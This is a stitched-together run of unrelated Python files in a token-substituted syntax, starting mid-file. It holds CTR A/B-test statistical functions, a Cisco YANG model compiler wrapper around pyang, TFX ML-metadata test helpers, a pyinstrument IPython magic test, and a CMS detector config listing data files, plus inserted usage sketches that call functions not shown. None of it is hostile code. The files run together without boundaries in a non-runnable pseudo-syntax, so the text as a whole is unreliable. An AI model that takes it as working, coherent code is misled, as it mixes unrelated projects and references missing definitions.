ctrs_1<block_end><def_stmt>bootstrap ctrs_0 weights_0 ctrs_1 weights_1 n_bootstrap=2000<block_start>""" Does weighted bootstrap and calculates p-value according to the bootstrapped distribution :param ctrs_0: np.array shape (n_experiments, n_users), CTRs of every user from control group in every experiment :param weights_0: np.array (n_experiments, n_users), weight of every user from control group in every experiment :param ctrs_1: np.array (n_experiments, n_users), CTRs of every user from treatment group in every experiment :param weights_1: np.array (n_experiments, n_users), weight of every user from treatment group in every experiment :param n_bootstrap: int - for every experiment we will generate n_bootstrap bootstrap pseudo-samples :return: np.array shape (n_experiments), two-sided p-values of weighted bootstrap test in all experiments """<line_sep>poisson_bootstraps=scipy.stats.poisson(1).rvs((n_bootstrap ctrs_0.shape[1])).astype(np.int64)<line_sep>values_0=np.matmul(ctrs_0<times>weights_0 poisson_bootstraps.T)<line_sep>weights_0=np.matmul(weights_0 poisson_bootstraps.T)<line_sep>values_1=np.matmul(ctrs_1<times>weights_1 
poisson_bootstraps.T)<line_sep>deltas=values_1/weights_1-values_0/weights_0<line_sep>positions=np.sum(deltas<l>0 axis=1)<line_sep><return>2<times>np.minimum(positions n_bootstrap-positions)/n_bootstrap<block_end><def_stmt>bucketization ctrs_0 weights_0 ctrs_1 weights_1 n_buckets=200<block_start>""" Does weighted bucketization and calculates p-values for all experiments using t_test :param ctrs_0: np.array shape (n_experiments, n_users), CTRs of every user from control group in every experiment :param weights_0: np.array (n_experiments, n_users), weight of every user from control group in every experiment :param ctrs_1: np.array (n_experiments, n_users), CTRs of every user from treatment group in every experiment :param weights_1: np.array (n_experiments, n_users), weight of every user from treatment group in every experiment :param n_buckets: int, number of buckets :return: np.array shape (n_experiments), two-sided p-values of weighted bucketization test in all the experiments """<line_sep>n_experiments,n_users=ctrs_0.shape<line_sep>values_0=np.zeros((n_experiments n_buckets))<line_sep>values_1=np.zeros((n_experiments n_buckets))<for_stmt>b np.arange(n_buckets)<block_start>ind=np.arange(b<times>n_users/n_buckets b<times>n_users/n_buckets+n_users/n_buckets).astype(int)<line_sep>values_0[: b]=np.sum(ctrs_0[: ind]<times>weights_0[: ind] axis=1)/np.sum(weights_0[: ind] axis=1)<line_sep>values_1[: b]=np.sum(ctrs_1[: ind]<times>weights_1[: ind] axis=1)/np.sum(weights_1[: ind] axis=1)<block_end><return>t_test(values_0 values_1)<block_end><def_stmt>binomial_test global_ctr_0 total_views_0 global_ctr_1 total_views_1<block_start>""" Calculates two-sided p-values for all the experiments on global CTRs using z-test :param global_ctr_0: np.array shape (n_experiments), global ctr in control group in every experiment :param total_views_0: np.array shape (n_experiments), sum of views in control group in every experiment :param global_ctr_1: np.array shape (n_experiments), global ctr in treatment group in every experiment :param total_views_1: np.array shape (n_experiments), sum of views in treatment group in every experiment :return: np.array shape (n_experiments), two-sided p-values of the z-test on global CTRs in all the experiments """<line_sep>overall_ctrs=(global_ctr_0<times>total_views_0+global_ctr_1<times>total_views_1)/(total_views_0+total_views_1)<line_sep>z_stats=(global_ctr_0-global_ctr_1)/np.sqrt(overall_ctrs<times>(1-overall_ctrs)<times>(1./total_views_0+1./total_views_1))<line_sep><return>2<times>np.minimum(scipy.stats.norm(0 1).cdf(z_stats) 1-scipy.stats.norm(0 1).cdf(z_stats))<block_end><def_stmt>delta_method_ctrs clicks_0 views_0 clicks_1 views_1<block_start>""" Calculates two-sided p-values for all the experiments on CTRs using delta-method :param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment :param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment :param clicks_1: np.array shape (n_experiments, n_users), clicks of every user from treatment group in every experiment :param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment :return: np.array shape (n_experiments), two-sided p-values of delta-method on CTRs in all the experiments """<line_sep>n_experiments,n_users=views_0.shape<line_sep>mean_clicks_0,var_clicks_0=np.mean(clicks_0 axis=1) np.var(clicks_0 
axis=1)<line_sep>mean_clicks_1,var_clicks_1=np.mean(clicks_1 axis=1) np.var(clicks_1 axis=1)<line_sep>mean_views_0,var_views_0=np.mean(views_0 axis=1) np.var(views_0 axis=1)<line_sep>mean_views_1,var_views_1=np.mean(views_1 axis=1) np.var(views_1 axis=1)<line_sep>cov_0=np.mean((clicks_0-mean_clicks_0.reshape(-1 1))<times>(views_0-mean_views_0.reshape(-1 1)) axis=1)<line_sep>cov_1=np.mean((clicks_1-mean_clicks_1.reshape(-1 1))<times>(views_1-mean_views_1.reshape(-1 1)) axis=1)<line_sep>var_0=var_clicks_0/mean_views_0<power>2+var_views_0<times>mean_clicks_0<power>2/mean_views_0<power>4-2<times>mean_clicks_0/mean_views_0<power>3<times>cov_0<line_sep>var_1=var_clicks_1/mean_views_1<power>2+var_views_1<times>mean_clicks_1<power>2/mean_views_1<power>4-2<times>mean_clicks_1/mean_views_1<power>3<times>cov_1<line_sep>ctrs_0=np.sum(clicks_0 axis=1)/np.sum(views_0 axis=1)<line_sep>ctrs_1=np.sum(clicks_1 axis=1)/np.sum(views_1 axis=1)<line_sep>z_stats=(ctrs_1-ctrs_0)/np.sqrt(var_0/n_users+var_1/n_users)<line_sep>p_ctr_delta=2<times>np.minimum(scipy.stats.norm(0 1).cdf(z_stats) 1-scipy.stats.norm(0 1).cdf(z_stats))<line_sep><return>p_ctr_delta<block_end><def_stmt>intra_user_correlation_aware_weights clicks_0 views_0 views_1<block_start>""" Calculates weights for UMVUE global ctr estimate for every user in every experiment both in treatment and control groups :param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment :param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment :param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment :return: (np.array, np.array) shape (n_experiments, n_users), weights for every user in every experiment """<line_sep>ri=clicks_0/views_0<line_sep>s3=clicks_0<times>(1-ri)<power>2+(views_0-clicks_0)<times>ri<power>2<line_sep>s3=np.sum(s3 axis=1)/np.sum(views_0-1 axis=1)<line_sep>rb=np.mean(clicks_0/views_0 axis=1).reshape(-1 1)<line_sep>s2=clicks_0<times>(1-rb)<power>2+(views_0-clicks_0)<times>rb<power>2<line_sep>s2=np.sum(s2 axis=1)/(np.sum(views_0 axis=1)-1)<line_sep>rho=np.maximum(0 1-s3/s2).reshape(-1 1)<line_sep>w_0=views_0/(1+(views_0-1)<times>rho)<line_sep>w_1=views_1/(1+(views_1-1)<times>rho)<line_sep><return>w_0 w_1<block_end><def_stmt>linearization_of_clicks clicks_0 views_0 clicks_1 views_1<block_start>""" Fits linear model clicks = k * views and returns clicks - k * views (e.g. 
it accounts for correlation of clicks and views) :param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment :param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment :param clicks_1: np.array shape (n_experiments, n_users), clicks of every user from treatment group in every experiment :param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment :return: (np.array, np.array) shape (n_experiments, n_users), linearized clicks for every user in every experiment """<line_sep>k=clicks_0.flatten().sum()/views_0.flatten().sum()<line_sep>L_0=clicks_0-k<times>views_0<line_sep>L_1=clicks_1-k<times>views_1<line_sep><return>L_0 L_1<block_end><def_stmt>permutation_test clicks_0:np.ndarray views_0:np.ndarray clicks_1:np.ndarray views_1:np.ndarray samples:int=2000<arrow>np.ndarray<block_start>n_experiments=views_0.shape[0]<line_sep>n_users_0=views_0.shape[1]<line_sep>n_users_1=views_1.shape[1]<line_sep>permutations=np.zeros((samples n_users_0+n_users_1)).astype(np.int32)<line_sep>permutation=np.arange(n_users_0+n_users_1)<for_stmt>i range(samples)<block_start>np.random.shuffle(permutation)<line_sep>permutations[i]=permutation.copy()<block_end>permutation_flags=(permutations<l>n_users_0).astype(np.int32)<line_sep>concated_views=np.hstack((views_0 views_1))<line_sep>concated_clicks=np.hstack((clicks_0 clicks_1))<line_sep>clicks_sum_0=np.matmul(concated_clicks permutation_flags.T)<line_sep>clicks_sum_1=np.matmul(concated_clicks 1-permutation_flags.T)<line_sep>views_sum_0=np.matmul(concated_views permutation_flags.T)<line_sep>views_sum_1=np.matmul(concated_views 1-permutation_flags.T)<line_sep>null_stats=clicks_sum_1/views_sum_1-clicks_sum_0/views_sum_0<line_sep>null_stats=np.sort(null_stats)<line_sep>p_values=np.zeros(n_experiments)<for_stmt>i range(n_experiments)<block_start>exp_stat=clicks_1[i].sum()/views_1[i].sum()-clicks_0[i].sum()/views_0[i].sum()<line_sep>insert_position=np.searchsorted(null_stats[i] exp_stat)<line_sep>p_values[i]=2<times>np.minimum(samples-insert_position insert_position)/samples<block_end><return>p_values<block_end>
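# --- Hedged usage sketch (not part of the original module) ---
# Shows how the helpers above might be composed end to end: simulate per-user
# clicks/views for control and treatment, smooth the CTRs, then compare a
# t-test on smoothed CTRs with the delta-method on global CTRs. The sample
# sizes, click rates and random seed below are illustrative assumptions only.
import numpy as np

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    n_experiments, n_users = 5, 1000
    views_0 = rng.poisson(10, size=(n_experiments, n_users)) + 1
    views_1 = rng.poisson(10, size=(n_experiments, n_users)) + 1
    clicks_0 = rng.binomial(views_0, 0.10)  # control CTR around 10%
    clicks_1 = rng.binomial(views_1, 0.11)  # treatment CTR around 11%

    ctrs_0, ctrs_1 = get_smoothed_ctrs(clicks_0, views_0, clicks_1, views_1)
    p_ttest = t_test(ctrs_0, ctrs_1)
    p_delta = delta_method_ctrs(clicks_0, views_0, clicks_1, views_1)
    print("t-test on smoothed CTRs:", p_ttest)
    print("delta method on global CTRs:", p_delta)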
""" Copyright 2015, Cisco Systems, Inc Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. @author: <NAME>, Cisco Systems, Inc. """<import_stmt>os<import_stmt>re<import_stmt>glob<import_stmt>logging<import_stmt>subprocess<import_from_stmt>sets Set<import_stmt>lxml.etree<as>ET<import_from_stmt>django.conf settings<import_from_stmt>explorer.utils.dygraph DYGraph<import_from_stmt>explorer.utils.misc ServerSettings<class_stmt>Parser(object)<block_start>""" Basic Yang modulename parser """<def_stmt>__init__ self filename<block_start>self.module=<none><line_sep>self.revision=<none><line_sep>self.imports=[]<line_sep>self.includes=[]<if_stmt><not>os.path.exists(filename)<block_start><return><block_end>module_re=re.compile("""^\s*[sub]*module\s+['"]?\s*([\w+[\-\w+]+)\s*['"]?\s*""")<line_sep>revision_re=re.compile("""^\s*revision\s+['"]?\s*(\w+-\w+-\w+)\s*['"]?\s*""")<line_sep>import_re=re.compile("""^\s*import\s+['"]?\s*([\w+[\-\w+]+)\s*['"]?\s*""")<line_sep>include_re=re.compile("""^\s*include\s+['"]?\s*([\w+[\-\w+]+)\s*['"]?\s*""")<with_stmt>open(filename 'r')<as>f<block_start><for_stmt>line f<block_start><if_stmt>self.module<is><none><block_start>res=module_re.match(line)<if_stmt>res<is><not><none><block_start>self.module=res.group(1).strip()<line_sep><continue><block_end><block_end>imp=import_re.match(line)<if_stmt>imp<is><not><none><block_start>self.imports.append(imp.group(1).strip())<line_sep><continue><block_end>inc=include_re.match(line)<if_stmt>inc<is><not><none><block_start>self.includes.append(inc.group(1).strip())<line_sep><continue><block_end>res=revision_re.match(line)<if_stmt>res<is><not><none><block_start>self.revision=res.group(1).strip()<line_sep><break><block_end><block_end><block_end><if_stmt>self.module<is><none><block_start>logging.error('Could not parse modulename, uploaded file may be corrupted !!')<block_end><block_end><def_stmt>get_filename self<block_start>""" Returns: yang file name with version suffix. """<if_stmt>self.revision<block_start><return>self.module+'@'+self.revision+'.yang'<block_end><return>self.module+'.yang'<block_end><def_stmt>get_dependency self<block_start>""" Returns: List of dependency (yang imports and includes) """<line_sep><return>self.imports+self.includes<block_end><def_stmt>__str__ self<block_start><return>self.get_filename()+' -> '+str(self.get_dependency())<block_end><block_end><class_stmt>Compiler(object)<block_start>""" Compile yang models into cxml """<line_sep>@staticmethod<def_stmt>compile_cxml username session filename<block_start>""" Compile yang model and return tuple (boolean, list-of-errors) """<line_sep>logging.debug('Compiling %s .. !!'%filename)<line_sep>plugins=os.path.join(settings.BASE_DIR 'explorer' 'plugins')<if_stmt><not>os.path.exists(plugins)<block_start>logging.error('CXML Plugin directory is missing .. !!')<line_sep><return><false> <none><block_end><if_stmt>subprocess.call(['which' 'pyang'])<ne>0<block_start>logging.error('Could not find pyang compiler, please install pyang .. 
!!')<line_sep><return><false> <none><block_end>basename=os.path.basename(filename)<line_sep>modulename=basename.split('.')[0].strip()<line_sep>session_dir=''<if_stmt>session<is><not><none><block_start>session_dir=ServerSettings.session_path(session)<if_stmt><not>os.path.exists(session_dir)<block_start>logging.error('compile_cxml: Session directory %s not found !!' session_dir)<line_sep><return><false> ["Session error !!"]<block_end>yangfile=os.path.join(session_dir modulename+'.yang')<line_sep>cxmlfile=os.path.join(session_dir modulename+'.xml')<block_end><else_stmt><block_start>yangfile=os.path.join(ServerSettings.yang_path(username) modulename+'.yang')<line_sep>cxmlfile=os.path.join(ServerSettings.cxml_path(username) modulename+'.xml')<block_end># Verify if yang file exists <if_stmt><not>os.path.exists(yangfile)<block_start>logging.debug("compile_cxml: "+yangfile+' not found !!')<line_sep><return><false> ["Yang module %s not found on server !!"%modulename]<block_end>command=['pyang' '-f' 'cxml' '--plugindir' 'explorer/plugins' '-p']<line_sep># include path for pyang compilation includes=ServerSettings.yang_path(username)<if_stmt>session_dir<block_start>includes<augadd>':'+session_dir<block_end>command.append(includes)<line_sep># include dependent models command<augadd>Compiler.get_dependencies(username [filename] session)<line_sep># finally add target module command.append(yangfile)<line_sep># create a callback to handle empty output <def_stmt>empty_callback outfile<block_start>module=os.path.basename(outfile)<line_sep>module=module.split('.')[0]<line_sep>module=module.split('@')[0]<line_sep>node=ET.Element('node')<line_sep>node.set('name' module)<line_sep>node.set('type' 'module')<with_stmt>open(outfile 'w')<as>fd<block_start>fd.write(ET.tostring(node))<block_end>logging.debug('compile_cxml: Empty output from pyang, created default cxml!!')<block_end><return>Compiler.invoke_compile(command cxmlfile empty_callback)<block_end>@staticmethod<def_stmt>compile_pyimport username session=<none><block_start>""" Compile yang model and return tuple (boolean, list-of-errors) """<line_sep>plugins=os.path.join(settings.BASE_DIR 'explorer' 'plugins')<if_stmt><not>os.path.exists(plugins)<block_start>logging.error('CXML Plugin directory is missing .. !!')<line_sep><return><false> <none><block_end><if_stmt>subprocess.call(['which' 'pyang'])<ne>0<block_start>logging.error('Could not find pyang compiler, please install pyang .. !!')<line_sep><return><false> <none><block_end>logging.debug('Rebuilding dependencies for user %s'%username)<line_sep># build include path includes=[ServerSettings.yang_path(username)]<if_stmt>session<is><not><none><block_start>session_dir=ServerSettings.session_path(session)<if_stmt><not>os.path.exists(session_dir)<block_start>logging.error('compile_pyimport: Session directory %s not found !!' 
session_dir)<line_sep><return><false> ["Session error !!"]<block_end>includes.append(session_dir)<line_sep>depfile=os.path.join(session_dir 'dependencies.xml')<block_end><else_stmt><block_start>depfile=os.path.join(includes[0] 'dependencies.xml')<block_end>target_yangs=[]<for_stmt>yang_dir includes<block_start><for_stmt>_file glob.glob(os.path.join(yang_dir '*.yang'))<block_start>target_yangs.append(_file)<block_end><block_end><if_stmt><not>target_yangs<block_start>logging.debug('compile_pyimport: No yang file found !!')<line_sep><return><true> ET.Element('messages')<block_end>command=['pyang' '-f' 'pyimport' '--plugindir' 'explorer/plugins' '-p']<line_sep>command<augadd>[':'.join(includes)]<line_sep>command<augadd>target_yangs<line_sep><return>Compiler.invoke_compile(command depfile)<block_end>@staticmethod<def_stmt>get_dependencies username modules session<block_start>""" return dependencies for given yang models """<line_sep>session_dir=''<line_sep>logging.debug("get_dependencies: Target Modules "+str(modules))<if_stmt>session<is><not><none><block_start>session_dir=ServerSettings.session_path(session)<line_sep>dfile=os.path.join(session_dir 'dependencies.xml')<block_end><else_stmt><block_start>dfile=os.path.join(ServerSettings.yang_path(username) 'dependencies.xml')<block_end><if_stmt><not>os.path.exists(dfile)<block_start>logging.error('get_dependencies: dependency file %s missing!!' dfile)<line_sep><return>[]<block_end><if_stmt>session_dir<block_start>session_files=[os.path.basename(_file)<for>_file glob.glob(os.path.join(session_dir '*.yang'))]<block_end>yang_path=ServerSettings.yang_path(username)<line_sep>yang_files=[os.path.basename(_file)<for>_file glob.glob(os.path.join(yang_path '*.yang'))]<line_sep>dmodules=Set([])<line_sep>dgraph=DYGraph(dfile)<for_stmt>m modules<block_start>module=dgraph.dependency_module(m)<if_stmt>module<is><none><block_start><continue><block_end><for_stmt>name module.imports<block_start>dmodules.add(name)<block_end><for_stmt>name module.includes<block_start>dmodules.add(name)<block_end><for_stmt>name module.depends<block_start>dmodules.add(name)<block_end><block_end>dmodules_list=list(dmodules)<line_sep>deplist=[]<for_stmt>_file dmodules_list# prefer freshly uploaded files <block_start><if_stmt>session_dir<block_start>depfile=_find_matching(_file session_dir session_files)<block_end><else_stmt><block_start>depfile=_find_matching(_file yang_path yang_files)<block_end><if_stmt>depfile<is><not><none><block_start>deplist.append(depfile)<block_end><else_stmt><block_start>logging.warning("get_dependencies: Dependency (%s) not satisfied, compilation may fail !!"%_file)<block_end><block_end>logging.debug("get_dependencies: Computed "+str(deplist))<line_sep><return>deplist<block_end>@staticmethod<def_stmt>invoke_compile command outfile empty_callback=<none><block_start>""" Invoke pyang compilation and return result """<line_sep>logging.debug("invoke_compile: CMD: "+str(command))<line_sep>p=subprocess.Popen(command stdout=subprocess.PIPE stderr=subprocess.PIPE)<line_sep>stdout,stderr=p.communicate()<line_sep>rc=<true><line_sep>lines=[]<if_stmt>stderr<block_start>lines=stderr.split('\n')<block_end><if_stmt>p.returncode<ne>0<block_start>logging.error('invoke_compile: Compile Errors: '+str(lines))<if_stmt>os.path.exists(outfile)<block_start>os.remove(outfile)<block_end>rc=<false><block_end><elif_stmt>stdout<block_start><with_stmt>open(outfile 'w')<as>fd<block_start>fd.write(stdout)<line_sep>logging.debug('invoke_compile: %s -> done' 
outfile)<block_end>logging.debug('invoke_compile: Compile Warning: '+str(lines))<block_end><else_stmt><block_start>logging.warning('invoke_compile: empty pyang output !!')<if_stmt>empty_callback<is><not><none><block_start>empty_callback(outfile)<block_end><block_end>messages=ET.Element('messages')<for_stmt>line lines<block_start>msg=ET.Element('message')<line_sep>msg.text=line<line_sep>messages.append(msg)<block_end><return>rc messages<block_end><block_end><def_stmt>_find_matching target directory modules<block_start>logging.debug('Searching target %s in %s'%(target directory))<if_stmt><not>modules<block_start>modules=[os.path.basename(_file)<for>_file glob.glob(os.path.join(directory '*.yang'))]<block_end><for_stmt>module modules<block_start><if_stmt>module<eq>target+'.yang'<block_start><return>os.path.join(directory module)<block_end><if_stmt>module.startswith(target+'@')<block_start><return>os.path.join(directory module)<block_end><block_end><return><none><block_end>
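# --- Hedged usage sketch (not part of the original module) ---
# Illustrates what the Parser class defined above extracts from a YANG file:
# module name, revision and import/include dependencies. The sample YANG text
# and the temporary-file handling are assumptions made for this demo only.
import os
import tempfile

EXAMPLE_YANG = """
module example-interfaces {
  import ietf-yang-types { prefix yang; }
  include example-interfaces-state;
  revision 2020-01-01;
}
"""

def demo_parser():
    with tempfile.NamedTemporaryFile('w', suffix='.yang', delete=False) as f:
        f.write(EXAMPLE_YANG)
        path = f.name
    try:
        p = Parser(path)           # Parser as defined above
        print(p.module)            # example-interfaces
        print(p.get_filename())    # example-interfaces@2020-01-01.yang
        print(p.get_dependency())  # ['ietf-yang-types', 'example-interfaces-state']
    finally:
        os.remove(path)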
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utilities for reading pipelines in testdata."""<import_stmt>os<import_stmt>shutil<import_stmt>ml_metadata<as>mlmd<import_from_stmt>ml_metadata.proto metadata_store_pb2<line_sep># constants in a mlmd metadata store instance derived from a tfx pipeline _TEST_DATA_DIR=os.path.join(os.path.dirname(__file__) 'tfx_oss_0_21')<line_sep>_TFX_0_21_DB_FILE='metadata.sqlite'<line_sep>_TFX_0_21_PAYLOAD_DIR='/tmp/tfx-interactive-2020-03-24T21_31_20.888155-mny0kawj'<line_sep>TFX_0_21_METRICS_ARTIFACT_IDS=(9 11)<line_sep>TFX_0_21_MODEL_ARTIFACT_ID=8<line_sep>TFX_0_21_MODEL_DATASET_ID=2<line_sep>TFX_0_21_MODEL_URI=os.path.join(_TEST_DATA_DIR 'Trainer/model/6')<line_sep>TFX_0_21_STATS_ARTIFACT_ID=3<line_sep>TFX_0_21_TRAINER_ID=6<def_stmt>get_tfx_pipeline_metadata_store tmp_db_path:str<arrow>mlmd.MetadataStore<block_start>"""Copies and opens a metadata_store from the testdata tfx pipeline db. It migrates the db to the compatible schema at the head. In addition, it updates the stored artifacts' uri to the test data db path, so that the test code can open the testdata files mentioned in the database. Args: tmp_db_path: a temp path for copying the pipeline database. Returns: A ml-metadata store for the copied pipeline db. """<line_sep>testdata_db_path=os.path.join(_TEST_DATA_DIR _TFX_0_21_DB_FILE)<line_sep>shutil.copyfile(testdata_db_path tmp_db_path)<line_sep>connection_config=metadata_store_pb2.ConnectionConfig(sqlite=metadata_store_pb2.SqliteMetadataSourceConfig(filename_uri=tmp_db_path connection_mode=metadata_store_pb2.SqliteMetadataSourceConfig.READWRITE ))<line_sep># The pipeline db is created with mlmd 0.21, the test run from the head # may include newer mlmd schema versions. We migrate the db to newer # mlmd schema if needed. store=mlmd.MetadataStore(connection_config enable_upgrade_migration=<true>)<line_sep># The pipeline db is generated with real pipelines in which the payloads of # the artifacts are stored in the file system when the pipeline ran. We fix # the uri to point to the testdata payloads generated by the pipeline. fixed_artifacts=[]<for_stmt>artifact store.get_artifacts()<block_start>artifact.uri=artifact.uri.replace(_TFX_0_21_PAYLOAD_DIR _TEST_DATA_DIR)<line_sep>fixed_artifacts.append(artifact)<block_end>store.put_artifacts(fixed_artifacts)<line_sep><return>store<block_end>
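# --- Hedged usage sketch (not part of the original module) ---
# How a test might use get_tfx_pipeline_metadata_store: copy the pipeline db
# into a temporary directory, open it, and look up the trained-model artifact
# via the constant above. The temp-dir handling is an assumption of typical
# test code, not something this module prescribes.
import tempfile


def demo_store():
    with tempfile.TemporaryDirectory() as tmp_dir:
        store = get_tfx_pipeline_metadata_store(
            os.path.join(tmp_dir, 'metadata.sqlite'))
        [model] = store.get_artifacts_by_id([TFX_0_21_MODEL_ARTIFACT_ID])
        # After the uri fix-up above, this should point under the testdata dir.
        print(model.uri)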
<import_from_stmt>test.fake_time_util fake_time<import_stmt>pytest<line_sep># note: IPython should be imported within each test. Importing it in our tests # seems to cause problems with subsequent tests. cell_code=""" import time def function_a(): function_b() function_c() def function_b(): function_d() def function_c(): function_d() def function_d(): function_e() def function_e(): time.sleep(0.1) function_a() """<line_sep># Tests # @pytest.mark.ipythonmagic<def_stmt>test_magics ip<block_start><import_from_stmt>IPython.utils.io capture_output<as>capture_ipython_output<with_stmt>fake_time()<block_start><with_stmt>capture_ipython_output()<as>captured<block_start>ip.run_cell_magic("pyinstrument" line="" cell=cell_code)<block_end><block_end><assert_stmt>len(captured.outputs)<eq>1<line_sep>output=captured.outputs[0]<assert_stmt>"text/html"<in>output.data<assert_stmt>"text/plain"<in>output.data<assert_stmt>"function_a"<in>output.data["text/html"]<assert_stmt>"<iframe"<in>output.data["text/html"]<assert_stmt>"function_a"<in>output.data["text/plain"]<assert_stmt>"- 0.200 function_a"<in>output.data["text/plain"]<assert_stmt>"- 0.100 sleep"<in>output.data["text/plain"]<with_stmt>fake_time()<block_start><with_stmt>capture_ipython_output()<as>captured# this works because function_a was defined in the previous cell <block_start>ip.run_line_magic("pyinstrument" line="function_a()")<block_end><block_end><assert_stmt>len(captured.outputs)<eq>1<line_sep>output=captured.outputs[0]<assert_stmt>"function_a"<in>output.data["text/plain"]<assert_stmt>"- 0.100 sleep"<in>output.data["text/plain"]<block_end>@pytest.mark.ipythonmagic<def_stmt>test_magic_empty_line ip# check empty line input <block_start>ip.run_line_magic("pyinstrument" line="")<block_end># Utils # @pytest.fixture(scope="module")<def_stmt>session_ip <block_start><import_from_stmt>IPython.testing.globalipapp start_ipython<line_sep><yield>start_ipython()<block_end>@pytest.fixture(scope="function")<def_stmt>ip session_ip<block_start>session_ip.run_line_magic(magic_name="load_ext" line="pyinstrument")<line_sep><yield>session_ip<line_sep>session_ip.run_line_magic(magic_name="reset" line="-f")<block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("DigisSegments")<line_sep>process.load("Geometry.CMSCommonData.cmsIdealGeometryXML_cff")<line_sep>process.load("Geometry.DTGeometry.dtGeometry_cfi")<line_sep>process.DTGeometryESModule.applyAlignment=<false><line_sep>process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")<line_sep>process.load("Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff")<line_sep>process.GlobalTag.globaltag="90X_dataRun2_Express_v2"<line_sep>process.load("RecoLocalMuon.Configuration.RecoLocalMuon_cff")<line_sep>## DT unpacker process.load("EventFilter.DTRawToDigi.dtunpacker_cfi")<line_sep>process.muonDTDigis.inputLabel='rawDataCollector'<line_sep>process.source=cms.Source("PoolSource" fileNames=cms.untracked.vstring("/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/90000/A8CD55CA-1F94-E611-8017-0CC47A7C35A8.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/90000/5E3D3C6E-6594-E611-AB43-0CC47A4D7616.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/FEB68681-5A87-E611-9374-FA163EBB015F.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F8A610D8-6287-E611-845E-FA163E57640C.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F80380BB-7687-E611-84D6-02163E01653D.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F4A6C6FD-B089-E611-9227-002590DE6E64.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F40149E2-7387-E611-B057-0025904CF766.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F21AA882-6C87-E611-8F39-FA163EA18210.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F0A05CAE-5387-E611-BACB-FA163E9FDE85.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F095A793-B389-E611-8A84-00259021A39E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/EE733CB6-B189-E611-A2A6-B499BAAC054A.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/EA70D05E-4589-E611-BFE3-FA163E3F2846.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/E46AF903-6C87-E611-8658-FA163EDB91EF.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/E4332BCB-D687-E611-A9EA-0025905A6126.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/E09E85A0-EB86-E611-B17D-20CF3019DEEF.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/DEEA9DDD-E187-E611-B13B-FA163E73AE79.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/DA12BA92-B087-E611-B7A3-0242AC130002.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D615D999-B189-E611-B46C-FA163E8E175A.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D6055073-6E87-E611-8E91-FA163E8D8332.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D4FD5F54-658B-E611-BED9-0CC47A4D7646.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D029A3C8-4B89-E611-9D1F-FA163E631428.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/CE3E1EE9-9789-E611-998C-FA163ED21222.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/CCDC87DF-1A88-E611-9B2A-1CC1DE19274E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C8F8C3B2-5387-E611-B9FC-FA163E5669B0.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C4B49819-F286-E611-B127-549F358EB76F.root" 
